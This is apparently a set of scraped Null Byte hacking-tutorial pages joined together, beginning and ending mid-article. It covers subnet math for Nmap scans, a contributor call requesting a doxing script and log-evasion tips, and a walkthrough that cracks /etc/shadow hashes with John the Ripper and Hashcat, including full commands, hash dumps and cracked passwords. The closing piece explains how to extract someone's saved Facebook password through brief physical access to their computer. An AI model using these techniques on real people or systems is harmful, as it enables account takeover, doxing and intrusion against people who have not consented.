flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.0.24 netmask 255.255.255.0 broadcast 192.168.0.255 inet6 2606:6000:66d0:a000:41b9:777e:5263:3b59 prefixlen 64 scopeid 0x0<global> inet6 fe80::b567:3ec1:3f0b:39bc prefixlen 64 scopeid 0x20<link> ether 00:c0:ca:95:6e:74 txqueuelen 1000 (Ethernet) RX packets 47663 bytes 37596073 (35.8 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 227500 bytes 22477997 (21.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0From this output, we can see out IPv4 address on our Wi-Fi interface wlan0 is 192.168.0.24, with a subnet mask of 255.255.255.0.From what we learned before, we immediately know the subnet mask looks like 11111111.11111111.11111111.00000000, meaning the fourth number in the IP address is the only one that's referring to individual host devices.Don't Miss:Spy on the Web Traffic for Any Computers on Your NetworkBecause we're counting in binary, this means there are a total of 256 possible IP addresses (from 0 to 255) on this network! If we're doing a scan, we know two things for crafting it:The first three numbers will always be the same while scanning devices on this network.The last number can only be a number between 0 and 255. Anything else can't exist on this network.However, we can narrow this down further. There are three addresses already guaranteed to be in use on this and every network. This is because of the way IPv4 is designed and means that there are really only 254 addresses available for devices on the network.So what are these reserved IP addresses, and how do we find them? The first is the broadcast address, the second is the network address, and the final will be the one at which the router is located, also called the default gateway.Step 4: Identify the Broadcast & Network AddressFinding the default gateway is easy. As mentioned before, you can typearp -ato show the current route to your gateway, which is where your computer is sending network traffic.arp -a_gateway (192.168.0.1) at 40:70:09:7a:64:97 [ether] on wlan0So how do we find the broadcast and network addresses?The broadcast network will always be the last IP address available on a network. In our IP range that starts at 0, this means that 192.168.0.255 will be the reserved broadcast address. Anything sent to this address is sent to every device on the network.The network address is the lowest possible IP address. In this case, that would be 192.168.0.0, meaning we shouldn't scan this address either. Doing so wouldn't yield any useful results.Don't Miss:Use Ettercap to Intercept Passwords with ARP SpoofingWith these two possible IP addresses off the table, the router is usually assigned the first usable IP address. After removing our reserved address, this matches up with the IP address in our ARP cache, 192.168.0.1.Now that we know this, we can avoid scanning the broadcast and network address and focus on the range starting with the router's IP address.Step 5: Run a Network Scan on a Calculated Network RangeNmapis a perfect example of a tool that requires you to know an IP address to use it. Let's consider an example where a hacker might find themselves on an unfamiliar network, and let's work through how they'd run Nmap on the network.On a penetration test, a hacker manages to access a poorly secured Wi-Fi network connected to a credit card system, allowing them to join a company Wi-Fi network. After runningifconfig, they see the following output.ifconfigwlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.5.29 netmask 255.255.240.0 broadcast 192.168.15.255Woah! This looks different. How can we make sense of what we're seeing? First, we can convert the subnet mask to binary to see how this network is different from the last one we looked at.255.255.240.0 11111111.11111111.11110000.00000000Okay, now we're getting somewhere. We could also show this subnet mask by writing it like192.168.5.29/20because it has twenty 1's in a row. That means the first 20 binary digits of the address are reserved for the address, meaning we have more possible IP addresses than our last example.So how many IP addresses are there? Well, we have a major clue to start. We have the broadcast address, which we know from before is the highest possible IP address in the range. If we convert it to binary, we can see that it's just the whole host area of the address full of ones.Broadcast: 192.168.15.255 11000000.10101000.0000 1111.11111111This means the network address, which we need to scan the whole network, just has zeros filled in the same spot. Let's add zeros where the ones are to give us the lowest address in the range, and the one we can use to scan the whole network.Network: 192.168.0.0/20 11000000.10101000.0000 0000.00000000That means that this network has 4,094 possible IP addresses, and we can scan all of them by runningnmap 192.168.0.0/20.If we didn't have the broadcast IP, we can still calculate it by turning the IP address into binary and then filling in the host section with all zeros. Based on what we learned before, the most likely IP address of the router would then be the first available IP address, which in this network would be 192.168.0.1.An IPv4 Address a Number We Can Learn a Lot FromKnowing how to calculate the network IP of an IPv4 network will allow you to scope out other devices on the network without wasting time scanning nonexistent IPs. With a glance at your own IP, you can even reliably access the router of a network on the first try without needing to run a scan.Even the most basic hacking tools will often require you to enter an IP address or a range of IP addresses in order to function. By calculating the network address and adding a subnet mask, it's easy to abbreviate an entire network with a number like "192.168.0.0/24" to scan all possible hosts on the network like a pro.If all else fails, you can always just plug the IP address into ipcalc to calculate everything in a hurry. Even if you don't find yourself calculating IP addressed by hand, you'll still be able to make better use of all the information ipcalc has to offer by understanding what each of the values mean and what to do with them.I hope you enjoyed this guide to calculating IPv4 network ranges! If you have any questions about this tutorial on IPv4 networking or you have a comment, do so below, and feel free to reach me on [email protected]'t Miss:Prevent Your Network from Being ARP-Spoofed with shARPFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo by Kody/Null ByteRelatedHow To:Optimize & Speed Up Web Surfing on Your Nexus 7 Tablet with This Super Easy ModHacker Fundamentals:A Tale of Two StandardsHow To:Control Network Traffic with Evil Limiter to Throttle or Kick Off DevicesHow To:Take the First Step Towards an In-Demand & Lucrative Career in IT for Under $35Networking Foundations:Exploring UDP via Wireshark(Part 2)How To:Bypass T-Mobile's Tethering Limit for FreeHow To:Linux Basics for the Aspiring Hacker: Using Ship for Quick & Handy IP Address InformationHack Like a Pro:Networking Basics for the Aspiring Hacker, Part 1Where Do I Start:Learn the FundamentalsNews:Coming Soon to a Smartphone Near You: 3D Navigation for Buildings!How To:A Hitchhiker's Guide to the Internet: Today and Now, How It All ConnectsHow To:Find your computer's IP address in Windows VistaHow To:Assign a Static IP Address in Windows 7How To:Secure Your Computer with Norton DNSHow To:Mask Your IP Address and Remain Anonymous with OpenVPN for LinuxHacker Fundamentals:A Gentle Introduction to How IP Addresses WorkHow To:Share Your Laptop's Wireless Internet with Ethernet DevicesThe Ultimate Guide:Diagnosing & Fixing Connection Issues, Part IIHow To:Spy on the Web Traffic for Any Computers on Your Network: An Intro to ARP PoisoningHow To:A Hitchhiker's Guide to the Internet: A Brief History of How the Net Came to BeHow To:Make Your Internet Faster in Windows XP, 7, Vista and Mac OS XNews:Welcome to Math CraftMastering Security, Part 2:How to Create a Home VPN TunnelNews:Red One BasicsThe Rdio App for Mac:A Desktop Alternative to iTunesHow To:Install "Incompatible" Firefox Add-Ons After Upgrading to the New FirefoxHow To:Quickly Encrypt Your Web Browsing Traffic When Connected to Public WiFi
Weekend Homework: How to Become a Null Byte Contributor (3/9/2012) Β« Null Byte :: WonderHowTo
Here at Null Byte, we try to inform and teach the community on ways to navigate the Internet in that special way, as well as staying safe along the trip. That being said, I need some help from all of you! There is a lot of information to cover and I know we have some smart users lurking around. We would love to hear from you.There is no need to be intimidated if you fear you lack the writing skills. I will give your articles an polish, if necessary, and get them looking great! You don't need to be a software architect to share your hard-earned knowledge with everyone!This Week's HomeworkWrite an Article on Anonymous File Sharing- Give us the ins and outs on how it works and how to set it up.Show Us How to Cover Your Steps- What logs should an aspiring hacker be looking for? What should they do? What shouldn't they do?Write a Doxing Script- In mydoxing article, I brought up Pipl. Write us a script that scrapes the database! Dox-in-a-box!Write a Backtrack Overview- Give us an overview of BT5. Cover the installation and the included packages.How to Use Virtual Machines to Run Multiple Operating Systems- Let's face it, WINE is old and sometimes you need to get into a Mac environment.Give Us Your Best Social Engineering Tips- Can you talk your way out of anything? Can you talk your wayintoanything? Do you have any tips you could share with the rest of us? Why break a password when you can simply ask for it, right?Write a Batch Image Converter in Python- Create a script in Python to covert a batch of images to a specified resolution, convenient for storing larger pictures, keeping them on phones, or emailing. Even better if it removes metadata!How to Buy Hardwareβ€” The computer hardware market is changing every day. Help new users make informed decisions by giving an overview of what's hot and available out there.Mac OS X vs. Linux- Do you know OS X well? Help some of the community who lacks skills with it. Show us how it relates to Linux.Turn a PS3 into a Firewall- Go ahead, show us how to use a PlayStation 3 to create a firewall for our network.How Else Can I Help?It would be great to get to know the community better and hear your ideas on the future of Null Byte. I look forward to discussing information security with you on theforum!If you have the skills and want to share your knowledge on any of the topics above, please leave a response in the comments with which topic you'd like to write about, ormessage meprivately. If you have any additional ideasat all, please submit them below. You might have amuchbetter idea.And one last thingβ€”if you come across a great news article or some helpful links, please post them to ourCommunity Corkboardto share with everyone!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicensePhoto byCCNAbooksRelatedNews:And the Winner of the White Hat Award for Technical Excellence Is...Weekend Homework:How to Become a Null Byte Contributor (2/17/2012)Weekend Homework:How to Become a Null Byte Contributor (3/2/2012)Weekend Homework:How to Become a Null Byte Contributor (3/16/2012)Weekend Homework:How to Become a Null Byte Contributor (2/24/2012)Weekend Homework:How to Become a Null Byte Contributor (2/3/2012)Weekend Homework:How to Become a Null Byte Contributor (2/10/2012)Weekend Homework:How to Become a Null Byte ContributorHow To:Things to Do on WonderHowTo (02/08 - 02/14)How To:Things to Do on WonderHowTo (02/01 - 02/07)How To:Things to Do on WonderHowTo (02/22 - 02/28)How To:Things to Do on WonderHowTo (03/21 - 03/27)Null Byte:Never Let Us DieHow To:Things to Do on WonderHowTo (02/15 - 02/21)How To:Things to Do on WonderHowTo (01/25 - 01/31)Weekend Homework:How to Become a Null Byte Contributor (1/29/2012)Weekend Homework:How to Become a Null Byte Contributor (1/12/2012)Community Roundup:Fix an Xbox with Pennies, Carve Polyhedral Pumpkins & MoreHow To:Things to Do on WonderHowTo (01/18 - 01/24)News:Null Byte Is Calling for Contributors!How Null Byte Injections Work:A History of Our NamesakeHow To:Things to Do on WonderHowTo (11/23 - 11/29)How To:Things to Do on WonderHowTo (03/07 - 03/13)Farewell Byte:Goodbye Alex, Welcome AllenNews:Hey, You! Astronomy World Is Looking for Contributors! Are You Up for the Task?How To:Things to Do on WonderHowTo (02/29 - 03/06)News:Ni No Kuni Coming To The US!News:A New Ink & Paint!How To:Enable Code Syntax Highlighting for Python in the Nano Text EditorNews:Null CommunityA Null Byte Call to Arms:Join the Fight Against IgnoranceHow To:Things to Do on WonderHowTo (01/11 - 01/17)How To:Quickly Encrypt Your Web Browsing Traffic When Connected to Public WiFiHow To:Things to Do on WonderHowTo (01/04 - 01/10)How To:Things to Do on WonderHowTo (11/16 - 11/22)How To:Things to Do on WonderHowTo (03/14 - 03/20)How To:Get Free Netflix for LifeSkyrim Hack:Get Whatever Items You Want By Hacking Your Game SaveHow To:Things to Do on WonderHowTo (11/30 - 12/06)How To:Run a Virtual Computer Within Your Host OS with VirtualBox
How to Crack Shadow Hashes After Getting Root on a Linux System Β« Null Byte :: WonderHowTo
Aftergaining access to a root account, the next order of business is using that power to do something more significant. If the user passwords on the system can be obtained and cracked, an attacker can use them to pivot to other machines if the login is the same across systems. There are two tried-and-true password cracking tools that can accomplish this:John the RipperandHashcat.Previously:Perform Local Privilege Escalation Using a Linux Kernel ExploitPasswd & Shadow File OverviewA couple files of particular interest onLinux systemsare the/etc/passwdand/etc/shadowfiles. The /etc/passwd file contains basic information about each user account on the system, including the root user which has full administrative rights, system service accounts, and actual users. There are seven fields in each line of /etc/passwd. A typical line looks something like this:msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bashThe first field is the user's login name. The second field traditionally contained an encrypted password, but nowadays (unless you get extremely lucky) it merely contains the letter "x," to denote that a password has been assigned. If this field is blank, the user does not need to supply a password to log in.The third field is the user ID, a unique number assigned to the user, followed by the group ID in the fourth field. The fifth field is typically the full name of the user, although this can also be left blank. The sixth field is the user's home directory, and finally, the seventh field is the default shell, usually set to /bin/bash.The /etc/shadow file contains the encrypted passwords of users on the system. While the /etc/passwd file is typically world-readable, the /etc/shadow is only readable by the root account. The shadow file also contains other information such as password expiration dates. A typical line in /etc/shadow will look like this:msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::Since we have achieved root-level access with ourkernel exploit, we can use these files to uncover passwords of other users in the hopes ofpivoting to other systemsandfurthering exploitation.Cracking Hashes with John the RipperThe first thing we need to do is copy the contents of /etc/passwd and /etc/shadow into their own text files on our local machine; let's call thempasswd.txtandshadow.txt, respectfully.cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/falsecat /etc/shadow root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7::: daemon:*:14684:0:99999:7::: bin:*:14684:0:99999:7::: sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7::: sync:*:14684:0:99999:7::: games:*:14684:0:99999:7::: man:*:14684:0:99999:7::: lp:*:14684:0:99999:7::: mail:*:14684:0:99999:7::: news:*:14684:0:99999:7::: uucp:*:14684:0:99999:7::: proxy:*:14684:0:99999:7::: www-data:*:14684:0:99999:7::: backup:*:14684:0:99999:7::: list:*:14684:0:99999:7::: irc:*:14684:0:99999:7::: gnats:*:14684:0:99999:7::: nobody:*:14684:0:99999:7::: libuuid:!:14684:0:99999:7::: dhcp:*:14684:0:99999:7::: syslog:*:14684:0:99999:7::: klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7::: sshd:*:14684:0:99999:7::: msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7::: bind:*:14685:0:99999:7::: postfix:*:14685:0:99999:7::: ftp:*:14685:0:99999:7::: postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7::: mysql:!:14685:0:99999:7::: tomcat55:*:14691:0:99999:7::: distccd:*:14698:0:99999:7::: user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7::: service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7::: telnetd:*:14715:0:99999:7::: proftpd:!:14727:0:99999:7::: statd:*:15474:0:99999:7:::John the Ripper is a popular password cracking tool that supports many commonhash typesas well as a useful autodetect feature. It has been around for a while now, and as such, it continues to be one of the strongest and easiest to use crackers available.Don't Miss:Crack User Passwords in a Linux System with John the RipperBefore we can feed the hashes we obtained into John, we need to use a utility calledunshadowto combine the passwd and shadow files into a format that John can read. Run the following command to merge the data into a new text file called passwords.txt.unshadow passwd.txt shadow.txt > passwords.txtJohn can run on its own by just typingjohnplus whatever file you are using for input, but it's often much more useful to supply awordlist. There are some wordlists available for use under the/usr/share/wordlistsdirectory, but for now, we'll usesqlmap.txtsince it is quite a nice list. Use the--wordlistflag to specify the list to use and pass in our input file:john --wordlist=/usr/share/wordlists/sqlmap.txt passwords.txt Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5" Use the "--format=aix-smd5" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 SSE2 4x3]) Remaining 1 password hash Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:51 DONE (2018-08-06 14:10) 0g/s 27478p/s 27478c/s 27478C/s Zzzzzzz1..zzzzzzzzzzzzzzz Session completedDon't Miss:Use Leaked Password Databases to Create Brute-Force WordlistsWe can see that John detects the type of hash used asmd5crypt, also known as aix-smd5, and after a bit of time, it completes the session successfully. Now we can use the--showflag to display the cracked passwords that John successfully recovered:john --show passwords.txt sys:batman:3:3:sys:/dev:/bin/sh klog:123456789:103:104::/home/klog:/bin/false msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash user:user:1001:1001:just a user,111,,:/home/user:/bin/bash service:service:1002:1002:,,,:/home/service:/bin/bash 6 password hashes cracked, 1 leftAfter the username in the first field, we can now see the cleartext password in the second field. It tells us that six out of seven password hashes were cracked; Depending on the hardware being used, the wordlist that's supplied, and the length and complexity of the passwords, various levels of success will be achieved.Cracking Hashes with HashcatThe next tool that we will look at is Hashcat. This is an extremely powerful hash-cracking tool with a ton of features and both CPU-based and GPU-based versions available. As ofHashcat v3.00, the CPU and GPU tools were merged, with the CPU-only version becoming Hashcat-legacy.Don't Miss:How to Crack Passwords Using HashcatUnlike John, the easiest way to use Hashcat is to only supply the password hashes themselves. Copy any hashes we want to crack into a new text file that we'll callhashes.txt:cat hashes.txt $1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. $1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0 $1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0 $1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/ $1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/ $1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0 $1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//Hashcat contains numerous modes that it can run as depending on the type of hash being used. We saw earlier that John identified our shadow hashes as md5crypt, so we can typehashcat --helpto display all the options for this tool as well as the different modes available. Down the list, we find that md5crypt is mode 500:0500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating Systems 3200 | bcrypt $2*$, Blowfish (Unix) | Operating Systems 7400 | sha256crypt $5$, SHA256 (Unix) | Operating Systems 1800 | sha512crypt $6$, SHA512 (Unix) | Operating Systems 122 | macOS v10.4, MacOS v10.5, MacOS v10.6 | Operating Systems 1722 | macOS v10.7 | Operating Systems 7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating SystemsRun the following command to start cracking.hashcat -m 500 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/sqlmap.txt -O hashcat (v4.1.0) starting... * Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but do not report related errors. OpenCL Platform #1: Intel(R) Corporation ======================================== * Device #1: Intel(R) Core(TM) i5 CPU M 480 @ 2.67GHz, 934/3736 MB allocatable, 4MCU OpenCL Platform #2: The pocl project ==================================== * Device #2: pthread-Intel(R) Core(TM) i5 CPU M 480 @ 2.67GHz, skipped. Hashes: 7 digests; 7 unique digests, 7 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Optimized-Kernel * Zero-ByteLet's break this down.The-mflag specifies the mode we want to use.The-aflag determines the attack type, in this case,0as the default straight mode.Then we specify the output file ascracked.txtwith the-oflag and pass inhashes.txtas our input file that contains the hashes. We can also use a wordlist just like we did before with John.Finally, the-Oflag enables optimized kernels (this may or may not need to be enabled depending on the system in use, just know that it does limit the password length).At any point while Hashcat is running, we can check the progress by simply typingsto display status:[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s Session..........: hashcat Status...........: Running Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) Hash.Target......: hashes.txt Time.Started.....: Mon Aug 6 14:18:10 2018 (30 secs) Time.Estimated...: Mon Aug 6 14:21:08 2018 (2 mins, 28 secs) Guess.Base.......: File (/usr/share/wordlists/sqlmap.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 15816 H/s (7.84ms) @ Accel:256 Loops:125 Thr:1 Vec:4 Recovered........: 5/7 (71.43%) Digests, 5/7 (71.43%) Salts Progress.........: 1648627/9845703 (16.74%) Rejected.........: 3059/1648627 (0.19%) Restore.Point....: 234929/1406529 (16.70%) Candidates.#1....: 9dH8eJEs -> 9notenler HWMon.Dev.#1.....: N/AOnce the process is almost finished, a message will be displayed followed by some information such as speed, the number of hashes recovered, and start and stop times.Approaching final keyspace - workload adjusted. Session..........: hashcat Status...........: Exhausted Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) Hash.Target......: hashes.txt Time.Started.....: Mon Aug 6 14:18:10 2018 (2 mins, 59 secs) Time.Estimated...: Mon Aug 6 14:21:09 2018 (0 secs) Guess.Base.......: File (/usr/share/wordlists/sqlmap.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 15738 H/s (8.15ms) @ Accel:256 Loops:125 Thr:1 Vec:4 Recovered........: 5/7 (71.43%) Digests, 5/7 (71.43%) Salts Progress.........: 9845703/9845703 (100.00%) Rejected.........: 30891/9845703 (0.31%) Restore.Point....: 1406529/1406529 (100.00%) Candidates.#1....: zzbell0506 -> zzzzzzzzzzzzzzz HWMon.Dev.#1.....: N/A Started: Mon Aug 6 14:18:06 2018 Stopped: Mon Aug 6 14:21:10 2018Now we can display the contents of cracked.txt and view the passwords in plaintext:cat cracked.txt $1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:batman $1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:postgres $1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:service $1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:userOnline Hash CrackingThe prevalence of cloud technologies and distributed computing brings a whole new angle to password cracking. Most of the time, hackers are running a virtual machine, laptop, or at best, a powerful desktop computer, but many online services utilize dedicated servers and resources for cracking hashes. Sites such asCrackStation,Online Hash Crack, andMD5/Sha1 Hash Crackeroffer the convenience of password cracking right from the browser. None of these seemed to support the md5crypt hashes that we had, but it's easy to find support for many common hash formats such as MD5, SHA1, and LM.One last quick note: If you can't find the right hash format online, or even if you just want to possibly save some time, it certainly doesn't hurt to consult Google. Sometimes if you just search for the exact hash you are trying to crack, you can get results. Chances are if it's a default or common password, or if it's a hash that's been cracked before, you can find it in the search results. A quick Google search could end up saving you a lot of time and effort.Wrapping UpIn this series, we learned how to use Metasploit tocompromise a web server and get a low-level shell, used a kernel exploit toperform local privilege escalation and gain root-level access, and cracked some password hashes using John the Ripper and Hashcat. A lot of times, a system can be owned using this exact same process, only with different exploits and attack vectors. Now that you have some more tools and techniques under your belts, get out there and practice away. Happy hacking!Don't Miss:Use Beginner Python to Build a Brute-Force Tool for SHA-1 HashesFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image bysucco/Pixabay; Screenshots by drd_/Null ByteRelatedHack Like a Pro:How to Crack Passwords, Part 3 (Using Hashcat)Hack Like a Pro:How to Crack User Passwords in a Linux SystemHack Like a Pro:Finding Potential SUID/SGID Vulnerabilities on Linux & Unix SystemsLocking Down Linux:Harden Sudo Passwords to Defend Against Hashcat AttacksHow To:Use Hash-Identifier to Determine Hash Types for Password CrackingHack Like a Pro:Metasploit for the Aspiring Hacker, Part 8 (Setting Up a Fake SMB Server to Capture Domain Passwords)Hack Like a Pro:How to Crack Passwords, Part 1 (Principles & Technologies)Hack Like a Pro:How to Grab & Crack Encrypted Windows PasswordsHow To:Perform a Pass-the-Hash Attack & Get System Access on WindowsHow To:Crack MD5 Hashes with All of Kali Linux's Default WordlistsHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords with CowpattyHack Like a Pro:Using TFTP to Install Malicious Software on the TargetHack Like a Pro:How to Crack Passwords, Part 2 (Cracking Strategy)How To:Recover Passwords for Windows PCs Using OphcrackHow To:Perform Local Privilege Escalation Using a Linux Kernel ExploitHow To:Use John the Ripper in Metasploit to Quickly Crack Windows HashesHow To:Parallel Programming with OpenMP: Building a SHA-512 Password CrackerHow to Hack Like a Pro:Getting Started with MetasploitHacking macOS:How to Hack a Mac Password Without Changing ItHacking Windows 10:How to Intercept & Decrypt Windows Passwords on a Local NetworkHack Like a Pro:Digital Forensics Using Kali, Part 2 (Acquiring a Hard Drive Image for Analysis)How To:Hack Mac OS X Lion PasswordsHow To:Make an Unbreakable Linux Password Using a SHA-2 Hash AlgorithmHow To:How Hackers Take Your Encrypted Passwords & Crack ThemRainbow Tables:How to Create & Use Them to Crack PasswordsHow To:GPU Accelerate Cracking Passwords with HashcatSecure Your Computer, Part 2:Password-Protect the GRUB Bootloader on Dual-Booted PCsHow To:Remove a Windows Password with a Linux Live CDHow To:Recover a Windows Password with OphcrackGoodnight Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsRoot Exploit:Memodipper Gets You Root Access to Systems Running Linux Kernel 2.6.39+Hack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterHow To:Mine Bitcoin and Make MoneyHow To:How Hackers Steal Your Internet & How to Defend Against ItNews:Advanced Cracking Techniques, Part 2: Intelligent BruteforcingNews:Advanced Cracking Techniques, Part 1: Custom DictionariesHow To:Create a Custom Arch Linux DistroHow To:Recover WinRAR and Zip PasswordsEditor Picks:The Top 10 Secret Resources Hiding in the Tor Network
Hack Like a Pro: How to Hack Facebook (Facebook Password Extractor) Β« Null Byte :: WonderHowTo
Welcome back, my novice hackers!As we saw inmy first tutorialonFacebook hacking, it is not a simple task. However, with the right skills and tools, as well as persistence and ingenuity, nothing is beyond our capabilities.One of the cardinal rules of hacking is: "If I can get physical access to the computer... GAME OVER!" This means that if I were given even just a few moments to the machine itself, I can hack anything I want from that computerβ€”including Facebook passwords.I recognize that not all of you are technically savvy, though, that doesn't mean you can't be withsome hard work. So this Facebook hack is for those of you without either the technical savvy or the work ethic to become so. All you need is a moment or two of unfettered physical access to the target's computer and you can easily have their Facebook password.Remember Me?This hack relies upon the fact that most of us want websites to remember us when we return. We don't want to put in our username and password every time we want to access the site, so we tell the browser to "Remember me." In that way, we don't need to re-authenticate and provide our password, our system simply remembers it and provides it to the website.Of course, those passwords must be stored somewhere on our computer. The key is to know where those passwords are stored and how to crack the hashed passwords when we find them. For instance, Mozilla stores the users passwords at:c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/**.default/cache2/entriesAs you can see in the screenshot below, I have displayed that directory and password hashes from a Windows 7 computer running Firefox 36. These are all the saved passwords from various websites that Firefox has stored.Note that the location of these passwords is in different places for each browser and sometimes in different places on different operating systems with the same browser. Look for more on this subject in myDigital Forensicsseries in the near future.Elcomsoft's Facebook Password Extraction ToolFortunately for us, there is a company in Russia named Elcomsoft.This company employs first-rate cryptographers and they develop and sell software to crack various password encryption schemes. (As a side note, a cryptographer from Elcomsoft was the first person arrested and prosecuted under the DCMA when he came to the U.S. for a conference. He was eventually acquitted.)Their software is listed as digital forensic tools, but they can just as easily be used for hacking purposes. One of their tools was used forthe iCloud hackthat revealed nude photos of Jennifer Lawrence and other Hollywood stars in August 2014.Elcomsoft developed a Windows tool named Facebook Password Extractor (FPE, for short) that extracts the user's Facebook password from its location on the user's system (the user must have used the "Remember me" feature) and then cracks it. Of course, we need physical access to the system to do this in most cases. Alternatively, if we can hack their system, we could upload this tool to the target system and then use itorwe could simply download the user's browser password file and use this tool locally on our system.You can download this free tool fromElcomsoft's website, which officially supports the following web browsers (though it may work on newer versions).Microsoft Internet Explorer (up to IE9)Mozilla Firefox (up to Firefox 4)Apple Safari (up to Safari 5)Opera (up to Opera 11)Google Chrome (up to Chrome 11)The process of using this tool is almost idiot-proof. (Almost a requirement for Facebook hacking, wouldn't you agree?) You simply install it on the system whose Facebook password you want to extract and it does everything else.One of the drawbacks to using this tool is that Elcomsoft released it back in 2011 and it has not been updated since. Maybe we should make this a Python project for the Null Byte community in 